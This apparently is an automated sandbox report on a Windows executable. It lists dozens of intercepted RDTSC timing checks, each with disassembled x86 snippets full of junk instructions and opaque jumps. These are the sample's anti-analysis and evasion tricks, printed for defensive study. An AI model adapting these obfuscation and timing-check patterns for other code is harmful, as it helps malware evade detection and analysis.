                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48997E second address: 489989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E60BA1656h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489989 second address: 4899AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC696h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4899AC second address: 489A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jc 00007F5E60BA166Ah 0x00000011 jmp 00007F5E60BA1664h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edx 0x0000001b jng 00007F5E60BA1665h 0x00000021 jmp 00007F5E60BA165Fh 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F5E60BA1658h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+1246885Eh] 0x00000048 mov dword ptr [ebp+122D206Eh], edx 0x0000004e call 00007F5E60BA1659h 0x00000053 push edi 0x00000054 jmp 00007F5E60BA1668h 0x00000059 pop edi 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F5E60BA165Ah 0x00000062 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489B8C second address: 489BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pushad 0x0000000c jc 00007F5E60CAC686h 0x00000012 jc 00007F5E60CAC686h 0x00000018 popad 0x00000019 pop esi 0x0000001a xchg eax, esi 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F5E60CAC688h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 nop 0x00000036 push edx 0x00000037 push edx 0x00000038 jmp 00007F5E60CAC68Ch 0x0000003d pop edx 0x0000003e pop edx 0x0000003f push eax 0x00000040 push esi 0x00000041 jng 00007F5E60CAC68Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489DAD second address: 489DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489EC7 second address: 489ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ECD second address: 489ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ED1 second address: 489ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ED5 second address: 489F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F5E60BA1658h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov di, cx 0x00000026 push 00000004h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F5E60BA1658h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2679h] 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c jng 00007F5E60BA1656h 0x00000052 pop edi 0x00000053 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F37 second address: 489F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F3D second address: 489F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A2DB second address: 48A2FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5E60CAC68Fh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F5E60CAC688h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A2FB second address: 48A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1667h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A656 second address: 48A66D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60CAC688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5E60CAC688h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A66D second address: 48A685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F5E60BA1656h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop ebx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A75B second address: 48A7BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jns 00007F5E60CAC688h 0x00000013 popad 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D3A1Fh] 0x0000001b lea eax, dword ptr [ebp+1248E0E4h] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F5E60CAC688h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b movzx ecx, ax 0x0000003e nop 0x0000003f pushad 0x00000040 jmp 00007F5E60CAC696h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A7BE second address: 48A7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E60BA1665h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A7DD second address: 465E9D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F5E60CAC688h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 movsx edx, bx 0x00000029 mov cl, bl 0x0000002b call dword ptr [ebp+1245A0BFh] 0x00000031 jg 00007F5E60CAC69Bh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F5E60CAC68Eh 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4D6 second address: 4CD4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4E0 second address: 4CD4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC697h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD68D second address: 4CD691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD829 second address: 4CD833 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD833 second address: 4CD844 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F5E60BA1656h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD844 second address: 4CD861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F5E60CAC686h 0x00000011 jbe 00007F5E60CAC686h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD9AA second address: 4CD9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD9B0 second address: 4CD9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDB61 second address: 4CDB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDB67 second address: 4CDBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5E60CAC692h 0x0000000b jmp 00007F5E60CAC68Ch 0x00000010 jmp 00007F5E60CAC696h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007F5E60CAC692h 0x0000001c pop esi 0x0000001d popad 0x0000001e jc 00007F5E60CAC6ACh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007F5E60CAC698h 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D02D7 second address: 4D02DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D02DF second address: 4D02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFE9E second address: 4CFEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA4 second address: 4CFEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA8 second address: 4CFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D414D second address: 4D4156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB600 second address: 4DB610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB610 second address: 4DB614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB614 second address: 4DB624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E60BA1656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB624 second address: 4DB631 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA671 second address: 4DA675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA675 second address: 4DA68D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60CAC686h 0x00000008 jo 00007F5E60CAC686h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007F5E60CAC688h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A1A3 second address: 48A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE70D second address: 4DE724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F5E60CAC686h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jp 00007F5E60CAC686h 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE724 second address: 4DE72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEE68 second address: 4DEE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC68Ah 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E192F second address: 4E1935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1935 second address: 4E1953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F5E60CAC686h 0x0000000c jmp 00007F5E60CAC691h 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1953 second address: 4E195D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E60BA1666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F47 second address: 4E1F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F52 second address: 4E1F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F58 second address: 4E1F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F5C second address: 4E1F66 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60BA1656h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9F73 second address: 4E9F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E60CAC686h 0x0000000a pop ebx 0x0000000b jng 00007F5E60CAC690h 0x00000011 jmp 00007F5E60CAC68Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F5E60CAC686h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9F96 second address: 4E9FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA1661h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9FBC second address: 4E9FCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ah 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9FCB second address: 4E9FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D46 second address: 4E7D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC694h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8077 second address: 4E807D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E89B7 second address: 4E89BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8D04 second address: 4E8D14 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E60BA1656h 0x00000008 jnc 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FDB second address: 4E8FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E60CAC686h 0x0000000a pop esi 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FE6 second address: 4E8FFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E60BA165Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FFA second address: 4E9001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9001 second address: 4E9018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E60BA165Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9018 second address: 4E901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9619 second address: 4E9657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E60BA1656h 0x0000000a pop ebx 0x0000000b push esi 0x0000000c jnc 00007F5E60BA1656h 0x00000012 jmp 00007F5E60BA1660h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E60BA1667h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9657 second address: 4E965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E965B second address: 4E9678 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E60BA1656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA1661h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9922 second address: 4E9926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9926 second address: 4E993F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Fh 0x00000007 ja 00007F5E60BA1656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E993F second address: 4E9969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pushad 0x00000008 jmp 00007F5E60CAC690h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9969 second address: 4E996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E996F second address: 4E997F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007F5E60CAC6A3h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE705 second address: 4EE722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E60BA1656h 0x0000000a pop ecx 0x0000000b jo 00007F5E60BA1662h 0x00000011 jp 00007F5E60BA1656h 0x00000017 jl 00007F5E60BA1656h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F2390 second address: 4F2394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F2394 second address: 4F239D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F239D second address: 4F23A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1456 second address: 4F145B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F145B second address: 4F146E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E60CAC68Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F146E second address: 4F1474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1474 second address: 4F14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E60CAC698h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F5E60CAC698h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E60CAC68Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F14BE second address: 4F14C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1611 second address: 4F1617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F17EC second address: 4F17F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F17F0 second address: 4F1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F5E60CAC696h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5E60CAC68Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1823 second address: 4F1829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1AB3 second address: 4F1AB8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1C5B second address: 4F1C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1C5F second address: 4F1C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F5E60CAC68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
